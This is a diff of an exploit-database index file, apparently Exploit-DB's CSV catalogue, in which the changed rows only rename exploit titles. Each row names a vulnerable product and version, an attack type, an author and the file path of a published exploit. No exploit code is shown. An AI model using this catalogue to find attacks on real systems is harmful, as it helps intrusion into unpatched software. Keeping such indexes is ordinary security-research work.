Denial of Service",2006-10-16,nnp,linux,dos,0 28817,platforms/multiple/local/28817.txt,"Internet Security Systems 3.6 - ZWDeleteFile Function Arbitrary File Deletion",2006-10-16,"Matousec Transparent security",multiple,local,0 -28818,platforms/php/webapps/28818.txt,"Mambo MostlyCE 4.5.4 - HTMLTemplate.php Remote File Inclusion",2006-10-16,The_BeKiR,php,webapps,0 +28818,platforms/php/webapps/28818.txt,"Mambo Module MOStlyCE 4.5.4 - HTMLTemplate.php Remote File Inclusion",2006-10-16,The_BeKiR,php,webapps,0 28819,platforms/php/webapps/28819.txt,"Lodel CMS 0.7.3 - Calcul-page.php Remote File Inclusion",2006-10-17,The_BeKiR,php,webapps,0 28820,platforms/php/webapps/28820.txt,"Webgenius Goop Gallery 2.0 - 'index.php' Cross-Site Scripting",2006-10-17,Lostmon,php,webapps,0 28821,platforms/php/webapps/28821.txt,"Maintain 3.0.0-RC2 - Example6.php Remote File Inclusion",2006-10-16,ERNE,php,webapps,0 @@ -26991,7 +26991,7 @@ id,file,description,date,author,platform,type,port 29816,platforms/windows/dos/29816.c,"FastStone Image Viewer 2.9/3.6 - '.bmp' Image Handling Memory Corruption",2007-04-04,"Ivan Fratric",windows,dos,0 29817,platforms/asp/webapps/29817.txt,"Gazi Okul Sitesi 2007 - Fotokategori.asp SQL Injection",2007-04-04,CoNqUeRoR,asp,webapps,0 29818,platforms/windows/dos/29818.c,"ACDSee 9.0 Photo Manager - Multiple BMP Denial of Service Vulnerabilities",2007-04-04,"Ivan Fratric",windows,dos,0 -29819,platforms/windows/dos/29819.c,"Irfanview 3.99 - Multiple BMP Denial of Service Vulnerabilities",2007-04-04,"Ivan Fratric",windows,dos,0 +29819,platforms/windows/dos/29819.c,"IrfanView 3.99 - Multiple .BMP Denial of Service Vulnerabilities",2007-04-04,"Ivan Fratric",windows,dos,0 29820,platforms/multiple/remote/29820.html,"Firebug 1.03 - Rep.JS Script Code Injection",2007-03-06,"Thor Larholm",multiple,remote,0 29821,platforms/php/webapps/29821.txt,"Livor 2.5 - 'index.php' Cross-Site Scripting",2007-04-06,"Arham Muhammad",php,webapps,0 29822,platforms/linux/local/29822.c,"Man Command - -H Flag Local Buffer Overflow",2007-04-06,"Daniel Roethlisberger",linux,local,0 @@ -27233,7 +27233,7 @@ id,file,description,date,author,platform,type,port 30224,platforms/windows/dos/30224.py,"Ingress Database Server 2.6 - Multiple Remote Vulnerabilities",2007-06-21,anonymous,windows,dos,0 30225,platforms/php/webapps/30225.txt,"eNdonesia 8.4 - mod.php viewarticle Action artid Parameter SQL Injection",2007-06-22,"laurent gaffie",php,webapps,0 30226,platforms/php/webapps/30226.txt,"eNdonesia 8.4 - banners.php click Action bid Parameter SQL Injection",2007-06-22,"laurent gaffie",php,webapps,0 -30227,platforms/php/webapps/30227.txt,"Joomla! / Mambo Component Mod_Forum - PHPBB_Root.php Remote File Inclusion",2007-06-22,spymeta,php,webapps,0 +30227,platforms/php/webapps/30227.txt,"Joomla! / Mambo Component Mod_Forum - 'PHPBB_Root.php' Remote File Inclusion",2007-06-22,spymeta,php,webapps,0 30228,platforms/osx/remote/30228.txt,"Apple WebCore - XMLHTTPRequest Cross-Site Scripting",2007-06-22,"Richard Moore",osx,remote,0 30229,platforms/multiple/remote/30229.txt,"SHTTPD 1.38 - Filename Parse Error Information Disclosure",2007-06-25,"Shay Priel",multiple,remote,0 30230,platforms/php/webapps/30230.txt,"MyNews 0.10 - AuthACC SQL Injection",2007-06-25,netVigilance,php,webapps,0 @@ -28027,9 +28027,9 @@ id,file,description,date,author,platform,type,port 31063,platforms/php/webapps/31063.txt,"WebCalendar 1.1.6 - pref.php Query String Cross-Site Scripting",2008-01-25,"Omer Singer",php,webapps,0 31064,platforms/php/webapps/31064.txt,"WebCalendar 1.1.6 - search.php adv Parameter Cross-Site Scripting",2008-01-25,"Omer Singer",php,webapps,0 31065,platforms/php/webapps/31065.txt,"F5 BIG-IP Application Security Manager 9.4.3 - 'report_type' Cross-Site Scripting",2008-01-26,nnposter,php,webapps,0 -31066,platforms/php/webapps/31066.txt,"Mambo MOStlyCE 2.4 Module - 'connector.php' Cross-Site Scripting",2008-01-28,"AmnPardaz ",php,webapps,0 +31066,platforms/php/webapps/31066.txt,"Mambo Module MOStlyCE 2.4 - 'connector.php' Cross-Site Scripting",2008-01-28,"AmnPardaz ",php,webapps,0 31067,platforms/php/webapps/31067.txt,"ClanSphere 2007.4.4 - 'install.php' Local File Inclusion",2008-01-28,p4imi0,php,webapps,0 -31068,platforms/php/webapps/31068.txt,"Mambo MOStlyCE Module 2.4 Image Manager Utility - Arbitrary File Upload",2008-01-28,"AmnPardaz ",php,webapps,0 +31068,platforms/php/webapps/31068.txt,"Mambo Module MOStlyCE 2.4 Image Manager Utility - Arbitrary File Upload",2008-01-28,"AmnPardaz ",php,webapps,0 31069,platforms/php/webapps/31069.txt,"eTicket 1.5.6-RC4 - 'index.php' Cross-Site Scripting",2008-01-28,jekil,php,webapps,0 40358,platforms/linux/remote/40358.py,"LamaHub 0.0.6.2 - Buffer Overflow",2016-09-09,Pi3rrot,linux,remote,4111 31070,platforms/asp/webapps/31070.txt,"ASPired2Protect Login Page - SQL Injection",2008-01-28,T_L_O_T_D,asp,webapps,0 @@ -28085,7 +28085,7 @@ id,file,description,date,author,platform,type,port 31123,platforms/php/webapps/31123.txt,"PowerScripts PowerNews 2.5.6 - 'subpage' Parameter Multiple Local File Inclusion",2008-02-08,"Alexandr Polyakov",php,webapps,0 31124,platforms/php/webapps/31124.txt,"Calimero.CMS 3.3 - 'id' Parameter Cross-Site Scripting",2008-02-08,Psiczn,php,webapps,0 31125,platforms/php/webapps/31125.txt,"Joovili 2.1 - 'members_help.php' Remote File Inclusion",2008-02-08,Cr@zy_King,php,webapps,0 -31126,platforms/php/webapps/31126.txt,"Serendipity Freetag-plugin 2.95 - 'style' Parameter Cross-Site Scripting",2008-02-08,"Alexander Brachmann",php,webapps,0 +31126,platforms/php/webapps/31126.txt,"S9Y Serendipity Freetag-plugin 2.95 - 'style' Parameter Cross-Site Scripting",2008-02-08,"Alexander Brachmann",php,webapps,0 31127,platforms/linux/remote/31127.txt,"Mozilla Firefox 2.0.9 - 'view-source:' Scheme Information Disclosure",2008-02-08,"Ronald van den Heetkamp",linux,remote,0 31128,platforms/multiple/dos/31128.txt,"Multiple IEA Software Products - HTTP POST Request Denial of Service",2008-02-08,"Luigi Auriemma",multiple,dos,0 31129,platforms/php/webapps/31129.txt,"Managed Workplace Service Center 4.x/5.x/6.x - Installation Information Disclosure",2008-02-08,"Brook Powers",php,webapps,0 @@ -28136,8 +28136,8 @@ id,file,description,date,author,platform,type,port 31701,platforms/php/webapps/31701.txt,"Digital Hive 2.0 - 'base.php' Parameter Cross-Site Scripting",2008-04-24,ZoRLu,php,webapps,0 31683,platforms/hardware/remote/31683.php,"Linksys E-series - Unauthenticated Remote Code Execution",2014-02-16,Rew,hardware,remote,0 31173,platforms/php/webapps/31173.txt,"pChart 2.1.3 - Multiple Vulnerabilities",2014-01-24,"Balazs Makany",php,webapps,80 -31174,platforms/php/webapps/31174.txt,"Joomla! Extension Komento 1.7.2 - Persistent Cross-Site Scripting",2014-01-24,"High-Tech Bridge SA",php,webapps,80 -31175,platforms/php/webapps/31175.txt,"Joomla! Extension JV Comment 3.0.2 - (index.php id Parameter) SQL Injection",2014-01-24,"High-Tech Bridge SA",php,webapps,80 +31174,platforms/php/webapps/31174.txt,"Joomla! Component 'com_komento' 1.7.2 - Persistent Cross-Site Scripting",2014-01-24,"High-Tech Bridge SA",php,webapps,80 +31175,platforms/php/webapps/31175.txt,"Joomla! Component 'com_jvcomment' 3.0.2 - 'id' Parameter SQL Injection",2014-01-24,"High-Tech Bridge SA",php,webapps,80 31176,platforms/windows/dos/31176.html,"MW6 Technologies Aztec ActiveX - (Data parameter) Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0 31177,platforms/windows/dos/31177.html,"MW6 Technologies Datamatrix ActiveX - (Data Parameter) - Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0 31178,platforms/windows/dos/31178.html,"MW6 Technologies MaxiCode ActiveX - (Data parameter) Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0 @@ -28175,15 +28175,15 @@ id,file,description,date,author,platform,type,port 31205,platforms/windows/dos/31205.txt,"Sami FTP Server 2.0.x - Multiple Commands Remote Denial Of Service Vulnerabilities",2008-02-15,Cod3rZ,windows,dos,0 31206,platforms/php/webapps/31206.txt,"Joomla! / Mambo Component com_smslist - 'listid' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0 31207,platforms/php/webapps/31207.txt,"Joomla! / Mambo Component com_activities - 'id' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0 -31208,platforms/php/webapps/31208.txt,"Joomla! / Mambo Component com_sg - 'pid' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0 +31208,platforms/php/webapps/31208.txt,"Joomla! / Mambo Component 'com_sg' - 'pid' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0 31209,platforms/php/webapps/31209.txt,"Joomla! / Mambo Component faq - 'catid' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0 31210,platforms/php/webapps/31210.txt,"Yellow Swordfish Simple Forum 1.10/1.11 - 'topic' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0 31211,platforms/php/webapps/31211.txt,"Yellow Swordfish Simple Forum 1.7/1.9 - 'index.php' SQL Injection",2008-02-15,S@BUN,php,webapps,0 31212,platforms/php/webapps/31212.txt,"Yellow Swordfish Simple Forum 1.x - 'topic' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0 -31213,platforms/php/webapps/31213.txt,"Joomla! / Mambo Component com_salesrep - 'rid' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0 +31213,platforms/php/webapps/31213.txt,"Joomla! / Mambo Component 'com_salesrep' - 'rid' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0 31214,platforms/php/webapps/31214.txt,"Joomla! / Mambo Component com_lexikon - 'id' Parameter SQL Injection",2008-02-16,S@BUN,php,webapps,0 -31215,platforms/php/webapps/31215.txt,"Joomla! / Mambo Component com_filebase - 'filecatid' Parameter SQL Injection",2008-02-16,S@BUN,php,webapps,0 -31216,platforms/php/webapps/31216.txt,"Joomla! / Mambo Component com_scheduling - 'id' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0 +31215,platforms/php/webapps/31215.txt,"Joomla! / Mambo Component 'com_filebase' - 'filecatid' Parameter SQL Injection",2008-02-16,S@BUN,php,webapps,0 +31216,platforms/php/webapps/31216.txt,"Joomla! / Mambo Component 'com_scheduling' - 'id' Parameter SQL Injection",2008-02-15,S@BUN,php,webapps,0 31217,platforms/php/webapps/31217.txt,"BanPro Dms 1.0 - 'index.php' Local File Inclusion",2008-02-16,muuratsalo,php,webapps,0 31218,platforms/linux/dos/31218.txt,"freeSSHd 1.2 - 'SSH2_MSG_NEWKEYS' Packet Remote Denial of Service",2008-02-17,"Luigi Auriemma",linux,dos,0 32241,platforms/php/webapps/32241.txt,"PHP Realty - 'dpage.php' SQL Injection",2008-08-13,CraCkEr,php,webapps,0 @@ -28197,9 +28197,9 @@ id,file,description,date,author,platform,type,port 31221,platforms/windows/webapps/31221.txt,"Ability Mail Server 2013 - Cross-Site Request Forgery (via Persistent Cross-Site Scripting) (Password Reset)",2014-01-27,"David Um",windows,webapps,0 31222,platforms/windows/dos/31222.py,"Oracle Outside In MDB - File Parsing Stack Based Buffer Overflow (PoC)",2014-01-27,Citadelo,windows,dos,0 31223,platforms/multiple/dos/31223.txt,"Mozilla Thunderbird 17.0.6 - Input Validation Filter Bypass",2014-01-27,Vulnerability-Lab,multiple,dos,0 -31224,platforms/php/webapps/31224.txt,"Joomla! / Mambo Component com_profile - 'oid' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0 +31224,platforms/php/webapps/31224.txt,"Joomla! / Mambo Component 'com_profile' - 'oid' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0 31225,platforms/php/webapps/31225.html,"RunCMS 1.6.1 - 'admin.php' Cross-Site Scripting",2008-02-18,NBBN,php,webapps,0 -31226,platforms/php/webapps/31226.txt,"Joomla! / Mambo Component com_detail - 'id' Parameter SQL Injection",2008-02-18,S@BUN,php,webapps,0 +31226,platforms/php/webapps/31226.txt,"Joomla! / Mambo Component 'com_detail' - 'id' Parameter SQL Injection",2008-02-18,S@BUN,php,webapps,0 31227,platforms/php/webapps/31227.txt,"Yellow Swordfish Simple Forum 1.x - 'sf-profile.php' SQL Injection",2008-02-18,S@BUN,php,webapps,0 31228,platforms/php/webapps/31228.txt,"WordPress Plugin Recipes Blog - 'id' Parameter SQL Injection",2008-02-18,S@BUN,php,webapps,0 31229,platforms/php/webapps/31229.txt,"ProjectPier 0.8 - Multiple HTML Injection / Cross-Site Scripting Vulnerabilities",2008-02-18,L4teral,php,webapps,0 @@ -28228,8 +28228,8 @@ id,file,description,date,author,platform,type,port 31251,platforms/php/webapps/31251.txt,"XOOPS 'badliege' Module - 'id' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0 31252,platforms/php/webapps/31252.txt,"PHP-Nuke Web_Links Module - 'cid' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0 31253,platforms/jsp/remote/31253.rb,"Oracle Forms and Reports 11.1 - Remote Exploit",2014-01-29,Mekanismen,jsp,remote,80 -31254,platforms/windows/remote/31254.py,"PCMan FTP Server 2.07 - ABOR Command Buffer Overflow",2014-01-29,"Mahmod Mahajna (Mahy)",windows,remote,21 -31255,platforms/windows/remote/31255.py,"PCMan FTP Server 2.07 - CWD Command Buffer Overflow",2014-01-29,"Mahmod Mahajna (Mahy)",windows,remote,21 +31254,platforms/windows/remote/31254.py,"PCMan FTP Server 2.07 - 'ABOR' Command Buffer Overflow",2014-01-29,"Mahmod Mahajna (Mahy)",windows,remote,21 +31255,platforms/windows/remote/31255.py,"PCMan FTP Server 2.07 - 'CWD' Command Buffer Overflow",2014-01-29,"Mahmod Mahajna (Mahy)",windows,remote,21 31256,platforms/php/webapps/31256.txt,"LinPHA 1.3.4 - Multiple Vulnerabilities",2014-01-29,killall-9,php,webapps,80 31331,platforms/php/webapps/31331.txt,"PHP-Nuke eGallery 3.0 Module - 'pid' Parameter SQL Injection",2008-03-04,"Aria-Security Team",php,webapps,0 31332,platforms/php/webapps/31332.txt,"PHP-Nuke 'Seminars' Module - 'Filename' Parameter Local File Inclusion",2008-03-04,The-0utl4w,php,webapps,0 @@ -28391,7 +28391,7 @@ id,file,description,date,author,platform,type,port 31432,platforms/linux/remote/31432.rb,"Skybluecanvas CMS - Remote Code Execution (Metasploit)",2014-02-05,Metasploit,linux,remote,0 31433,platforms/multiple/remote/31433.rb,"Apache Tomcat Manager - Application Upload Authenticated Code Execution (Metasploit)",2014-02-05,Metasploit,multiple,remote,80 31434,platforms/java/remote/31434.rb,"Apache Struts - Developer Mode OGNL Execution (Metasploit)",2014-02-05,Metasploit,java,remote,8080 -31435,platforms/php/webapps/31435.py,"Joomla! Component JomSocial 2.6 - Code Execution",2014-02-05,"Matias Fontanini",php,webapps,80 +31435,platforms/php/webapps/31435.py,"Joomla! Component 'com_community' 2.6 - Code Execution",2014-02-05,"Matias Fontanini",php,webapps,80 31436,platforms/php/webapps/31436.txt,"Pandora Fms 5.0RC1 - Remote Command Injection",2014-02-05,xistence,php,webapps,80 31438,platforms/java/webapps/31438.txt,"IBM Rational ClearQuest 7.0 - Multiple Parameters Multiple Cross-Site Scripting Vulnerabilities",2008-03-19,sasquatch,java,webapps,0 31439,platforms/php/webapps/31439.txt,"cPanel 11.18.3 - List Directories and Folders Information Disclosure",2008-03-18,Linux_Drox,php,webapps,0 @@ -28403,7 +28403,7 @@ id,file,description,date,author,platform,type,port 31445,platforms/jsp/webapps/31445.txt,"Elastic Path 4.1 - 'manager/getImportFileRedirect.jsp' file Parameter Traversal Arbitrary File Access",2008-03-20,"Daniel Martin Gomez",jsp,webapps,0 31446,platforms/jsp/webapps/31446.txt,"Elastic Path 4.1 - 'manager/FileManager.jsp' dir Variable Traversal Arbitrary Directory Listing",2008-03-20,"Daniel Martin Gomez",jsp,webapps,0 31447,platforms/php/webapps/31447.txt,"News-Template 0.5beta - 'print.php' Multiple Cross-Site Scripting Vulnerabilities",2008-03-20,ZoRLu,php,webapps,0 -31448,platforms/php/webapps/31448.txt,"Joomla! / Mambo Component Datsogallery 1.3.1 - 'id' Parameter SQL Injection",2008-03-20,Cr@zy_King,php,webapps,0 +31448,platforms/php/webapps/31448.txt,"Joomla! / Mambo Component 'com_datsogallery' 1.3.1 - 'id' Parameter SQL Injection",2008-03-20,Cr@zy_King,php,webapps,0 31449,platforms/php/webapps/31449.txt,"W-Agora 4.0 - add_user.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 31450,platforms/php/webapps/31450.txt,"W-Agora 4.0 - create_forum.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 31451,platforms/php/webapps/31451.txt,"W-Agora 4.0 - create_user.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 @@ -28464,7 +28464,7 @@ id,file,description,date,author,platform,type,port 31513,platforms/php/webapps/31513.txt,"Quick Classifieds 1.0 - include/usersHead.inc DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 31514,platforms/php/webapps/31514.txt,"Quick Classifieds 1.0 - style/default.scheme.inc DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 31515,platforms/php/webapps/31515.txt,"osCommerce 2.3.3.4 - (geo_zones.php zID Parameter) SQL Injection",2014-02-07,"Ahmed Aboul-Ela",php,webapps,80 -31516,platforms/php/webapps/31516.txt,"Serendipity 1.7.5 (Backend) - Multiple Vulnerabilities",2014-02-07,"Stefan Schurtz",php,webapps,80 +31516,platforms/php/webapps/31516.txt,"S9Y Serendipity 1.7.5 - (Backend) Multiple Vulnerabilities",2014-02-07,"Stefan Schurtz",php,webapps,80 31517,platforms/php/webapps/31517.txt,"CTERA 3.2.29.0 / 3.2.42.0 - Persistent Cross-Site Scripting",2014-02-07,"Luigi Vezzoso",php,webapps,80 31518,platforms/linux/remote/31518.rb,"Pandora Fms - Remote Code Execution (Metasploit)",2014-02-07,Metasploit,linux,remote,8023 31519,platforms/hardware/remote/31519.rb,"Android Browser and WebView addJavascriptInterface - Code Execution (Metasploit)",2014-02-07,Metasploit,hardware,remote,0 @@ -28539,7 +28539,7 @@ id,file,description,date,author,platform,type,port 31592,platforms/windows/dos/31592.txt,"Microsoft Internet Explorer 8 Beta 1 - XDR Prototype Hijacking Denial of Service",2008-04-02,"The Hacker Webzine",windows,dos,0 31593,platforms/windows/dos/31593.txt,"Microsoft Internet Explorer 8 Beta 1 - 'ieframe.dll' Script Injection",2008-04-02,"The Hacker Webzine",windows,dos,0 31594,platforms/linux/dos/31594.html,"Opera Web Browser 9.26 - Multiple Security Vulnerabilities",2008-04-03,"Michal Zalewski",linux,dos,0 -31595,platforms/php/webapps/31595.txt,"Joomla! / Mambo Component Joomlaearn Lms - 'cat' Parameter SQL Injection",2008-04-03,The-0utl4w,php,webapps,0 +31595,platforms/php/webapps/31595.txt,"Joomla! / Mambo Component 'com_lms' - 'cat' Parameter SQL Injection",2008-04-03,The-0utl4w,php,webapps,0 31596,platforms/php/webapps/31596.txt,"mcGallery 1.1 - admin.php lang Parameter Cross-Site Scripting",2008-04-03,K-9999,php,webapps,0 31597,platforms/php/webapps/31597.txt,"mcGallery 1.1 - 'index.php' lang Parameter Cross-Site Scripting",2008-04-03,K-9999,php,webapps,0 31598,platforms/php/webapps/31598.txt,"mcGallery 1.1 - sess.php lang Parameter Cross-Site Scripting",2008-04-03,K-9999,php,webapps,0 @@ -29655,7 +29655,7 @@ id,file,description,date,author,platform,type,port 32804,platforms/php/webapps/32804.txt,"lastRSS autoposting bot MOD 0.1.3 - 'phpbb_root_path' Parameter Remote File Inclusion",2009-02-20,Kacper,php,webapps,0 32805,platforms/linux/local/32805.c,"Linux Kernel 2.6.x - 'sock.c' SO_BSDCOMPAT Option Information Disclosure",2009-02-20,"Clément Lecigne",linux,local,0 32806,platforms/php/webapps/32806.txt,"Blue Utopia - 'index.php' Local File Inclusion",2009-02-22,PLATEN,php,webapps,0 -32807,platforms/php/webapps/32807.txt,"Joomla! / Mambo Component gigCalendar 1.0 - 'banddetails.php' SQL Injection",2009-02-23,"Salvatore Fresta",php,webapps,0 +32807,platforms/php/webapps/32807.txt,"Joomla! / Mambo Component 'com_gigcal' 1.0 - 'banddetails.php' SQL Injection",2009-02-23,"Salvatore Fresta",php,webapps,0 32808,platforms/php/webapps/32808.txt,"Magento 1.2 - app/code/core/Mage/Admin/Model/Session.php login['Username'] Parameter Cross-Site Scripting",2009-02-24,"Loukas Kalenderidis",php,webapps,0 32809,platforms/php/webapps/32809.txt,"Magento 1.2 - app/code/core/Mage/Adminhtml/controllers/IndexController.php email Parameter Cross-Site Scripting",2009-02-24,"Loukas Kalenderidis",php,webapps,0 32810,platforms/php/webapps/32810.txt,"Magento 1.2 - downloader/index.php URL Cross-Site Scripting",2009-02-24,"Loukas Kalenderidis",php,webapps,0 @@ -30795,7 +30795,7 @@ id,file,description,date,author,platform,type,port 34136,platforms/multiple/remote/34136.txt,"Plesk Server Administrator (PSA) - 'locale' Parameter Local File Inclusion",2010-06-21,"Pouya Daneshmand",multiple,remote,0 34114,platforms/php/webapps/34114.txt,"Joomla! Component Jreservation - Cross-Site Scripting",2010-06-09,Sid3^effects,php,webapps,0 34086,platforms/linux/webapps/34086.txt,"BitDefender GravityZone 5.1.5.386 - Multiple Vulnerabilities",2014-07-16,"SEC Consult",linux,webapps,443 -34087,platforms/php/webapps/34087.txt,"Joomla! Component YouTube Gallery - SQL Injection",2014-07-16,"Pham Van Khanh",php,webapps,80 +34087,platforms/php/webapps/34087.txt,"Joomla! Component 'com_youtubegallery' - SQL Injection",2014-07-16,"Pham Van Khanh",php,webapps,80 34153,platforms/php/webapps/34153.txt,"2DayBiz ybiz Network Community Script - SQL Injection / Cross-Site Scripting",2010-06-16,Sid3^effects,php,webapps,0 34138,platforms/php/webapps/34138.txt,"VideoWhisper PHP 2 Way Video Chat - 'r' Parameter Cross-Site Scripting",2010-06-14,Sid3^effects,php,webapps,0 34077,platforms/php/webapps/34077.txt,"TPO Duyuru Scripti - Insecure Cookie Authentication Bypass",2010-06-02,Septemb0x,php,webapps,0 @@ -31192,7 +31192,7 @@ id,file,description,date,author,platform,type,port 34523,platforms/multiple/remote/34523.txt,"Nagios XI - 'users.php' SQL Injection",2010-08-24,"Adam Baldwin",multiple,remote,0 34524,platforms/php/webapps/34524.txt,"WordPress Plugin Huge-IT Image Gallery 1.0.1 - Authenticated SQL Injection",2014-09-02,"Claudio Viviani",php,webapps,80 34525,platforms/multiple/webapps/34525.txt,"Syslog LogAnalyzer 3.6.5 - Persistent Cross-Site Scripting (Python Exploit)",2014-09-02,"Dolev Farhi",multiple,webapps,0 -34637,platforms/php/webapps/34637.txt,"Joomla! Component Spider Form Maker 3.4 - SQL Injection",2014-09-12,"Claudio Viviani",php,webapps,0 +34637,platforms/php/webapps/34637.txt,"Joomla! Component 'com_formmaker' 3.4 - SQL Injection",2014-09-12,"Claudio Viviani",php,webapps,0 34532,platforms/windows/remote/34532.c,"Bloodshed Dev-C++ 4.9.9.2 - Multiple EXE Loading Arbitrary Code Execution",2010-08-25,storm,windows,remote,0 34684,platforms/php/webapps/34684.pl,"Joomla! Component Spain - 'nv' Parameter SQL Injection",2010-09-20,FL0RiX,php,webapps,0 34530,platforms/windows/dos/34530.py,"Crystal Player 1.98 - '.mls' Buffer Overflow",2010-08-20,"Praveen Darshanam",windows,dos,0 @@ -31230,7 +31230,7 @@ id,file,description,date,author,platform,type,port 34565,platforms/php/webapps/34565.txt,"NuSOAP 0.9.5 - 'nusoap.php' Cross-Site Scripting",2010-09-03,"Bogdan Calin",php,webapps,0 34578,platforms/php/webapps/34578.txt,"WordPress Theme Acento - 'view-pdf.php file Parameter' Arbitrary File Download",2014-09-08,alieye,php,webapps,80 34581,platforms/php/webapps/34581.txt,"Zen Cart 1.5.3 - Multiple Vulnerabilities",2014-09-08,smash,php,webapps,80 -34571,platforms/php/webapps/34571.py,"Joomla! Component Spider Calendar 3.2.6 - SQL Injection",2014-09-08,"Claudio Viviani",php,webapps,0 +34571,platforms/php/webapps/34571.py,"Joomla! Component 'com_spidercalendar' 3.2.6 - SQL Injection",2014-09-08,"Claudio Viviani",php,webapps,0 34572,platforms/php/webapps/34572.txt,"WordPress Plugin Bulk Delete Users by Email 1.0 - Cross-Site Request Forgery",2014-09-08,"Fikri Fadzil",php,webapps,0 34580,platforms/php/webapps/34580.txt,"phpMyFAQ 2.8.x - Multiple Vulnerabilities",2014-09-08,smash,php,webapps,80 34579,platforms/php/webapps/34579.txt,"vBulletin 5.1.x - Persistent Cross-Site Scripting",2014-09-08,smash,php,webapps,80 @@ -31276,7 +31276,7 @@ id,file,description,date,author,platform,type,port 34622,platforms/windows/remote/34622.txt,"Axigen Webmail 1.0.1 - Directory Traversal",2010-09-15,"Bogdan Calin",windows,remote,0 34751,platforms/hardware/webapps/34751.pl,"ZYXEL Prestig P-660HNU-T1 - ISP Credentials Disclosure",2014-09-24,"Sebastián Magof",hardware,webapps,80 34624,platforms/php/webapps/34624.txt,"OroCRM - Persistent Cross-Site Scripting",2014-09-11,Provensec,php,webapps,80 -34625,platforms/php/webapps/34625.py,"Joomla! Component Spider Contacts 1.3.6 - (index.php contacts_id Parameter)SQL Injection",2014-09-11,"Claudio Viviani",php,webapps,80 +34625,platforms/php/webapps/34625.py,"Joomla! Component 'com_spidercontacts' 1.3.6 - 'contacts_id' Parameter SQL Injection",2014-09-11,"Claudio Viviani",php,webapps,80 34626,platforms/ios/webapps/34626.txt,"Photorange 1.0 iOS - File Inclusion",2014-09-11,Vulnerability-Lab,ios,webapps,9900 34627,platforms/ios/webapps/34627.txt,"ChatSecure IM 2.2.4 iOS - Persistent Cross-Site Scripting",2014-09-11,Vulnerability-Lab,ios,webapps,0 34628,platforms/php/webapps/34628.txt,"Santafox 2.0.2 - 'search' Parameter Cross-Site Scripting",2010-09-06,"High-Tech Bridge SA",php,webapps,0 @@ -31399,8 +31399,8 @@ id,file,description,date,author,platform,type,port 34749,platforms/php/webapps/34749.txt,"CJ Dynamic Poll Pro 2.0 - 'admin_index.php' Cross-Site Scripting",2009-07-21,Moudi,php,webapps,0 34752,platforms/windows/dos/34752.c,"WS10 Data Server - SCADA Exploit Overflow (PoC)",2014-09-24,"Pedro Sánchez",windows,dos,0 34753,platforms/asp/webapps/34753.py,"Onlineon E-Ticaret - Database Disclosure",2014-09-24,ZoRLu,asp,webapps,80 -34754,platforms/php/webapps/34754.py,"Joomla! Component Face Gallery 1.0 - Multiple Vulnerabilities",2014-09-24,"Claudio Viviani",php,webapps,80 -34755,platforms/php/webapps/34755.py,"Joomla! Component Mac Gallery 1.5 - Arbitrary File Download",2014-09-24,"Claudio Viviani",php,webapps,80 +34754,platforms/php/webapps/34754.py,"Joomla! Component 'com_facegallery' 1.0 - Multiple Vulnerabilities",2014-09-24,"Claudio Viviani",php,webapps,80 +34755,platforms/php/webapps/34755.py,"Joomla! Component 'com_macgallery' 1.5 - Arbitrary File Download",2014-09-24,"Claudio Viviani",php,webapps,80 34756,platforms/windows/remote/34756.rb,"EMC AlphaStor Device Manager Opcode 0x75 - Command Injection (Metasploit)",2014-09-24,Metasploit,windows,remote,3000 34757,platforms/windows/remote/34757.rb,"Advantech Webaccess - dvs.ocx GetColor Buffer Overflow (Metasploit)",2014-09-24,Metasploit,windows,remote,0 34758,platforms/php/webapps/34758.txt,"Glype 1.4.9 - Cookie Injection Directory Traversal Local File Inclusion",2014-09-24,Securify,php,webapps,80 @@ -31826,7 +31826,7 @@ id,file,description,date,author,platform,type,port 35217,platforms/windows/dos/35217.txt,"CorelDRAW X7 CDR File - 'CdrTxt.dll' Off-by-One Stack Corruption",2014-11-12,LiquidWorm,windows,dos,0 35218,platforms/php/webapps/35218.txt,"WordPress Plugin SupportEzzy Ticket System 1.2.5 - Persistent Cross-Site Scripting",2014-11-12,"Halil Dalabasmaz",php,webapps,80 35219,platforms/multiple/webapps/35219.txt,"Proticaret E-Commerce Script 3.0 - SQL Injection (1)",2014-11-13,"Onur Alanbel (BGA)",multiple,webapps,0 -35220,platforms/multiple/webapps/35220.txt,"Joomla! Component HD FLV Player < 2.1.0.1 - SQL Injection",2014-11-13,"Claudio Viviani",multiple,webapps,0 +35220,platforms/multiple/webapps/35220.txt,"Joomla! Component 'com_hdflvplayer' < 2.1.0.1 - SQL Injection",2014-11-13,"Claudio Viviani",multiple,webapps,0 35222,platforms/jsp/webapps/35222.txt,"F5 BIG-IP 10.1.0 - Directory Traversal",2014-11-13,"Anastasios Monachos",jsp,webapps,0 35223,platforms/php/webapps/35223.txt,"Digi Online Examination System 2.0 - Unrestricted Arbitrary File Upload",2014-11-13,"Halil Dalabasmaz",php,webapps,80 35224,platforms/php/webapps/35224.txt,"MyBB 1.8.x - Multiple Vulnerabilities",2014-11-13,smash,php,webapps,80 @@ -31851,7 +31851,7 @@ id,file,description,date,author,platform,type,port 35243,platforms/multiple/remote/35243.txt,"Eclipse 3.3.2 IDE - Help Server help/advanced/workingSetManager.jsp workingSet Parameter Cross-Site Scripting",2008-04-24,Rob,multiple,remote,0 35244,platforms/windows/dos/35244.py,"Golden FTP Server 4.70 - Malformed Message 